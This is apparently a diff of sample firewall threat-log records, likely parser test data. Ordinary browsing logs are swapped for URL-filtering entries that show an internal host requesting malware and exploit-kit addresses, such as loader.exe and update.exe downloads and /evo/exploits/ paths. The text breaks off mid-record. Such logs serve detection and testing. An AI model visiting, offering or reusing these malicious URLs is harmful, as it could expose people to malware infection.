07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,"ga.js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, -Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html +Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,"wantfinest.com/tds/in.cgi?default",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, +Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 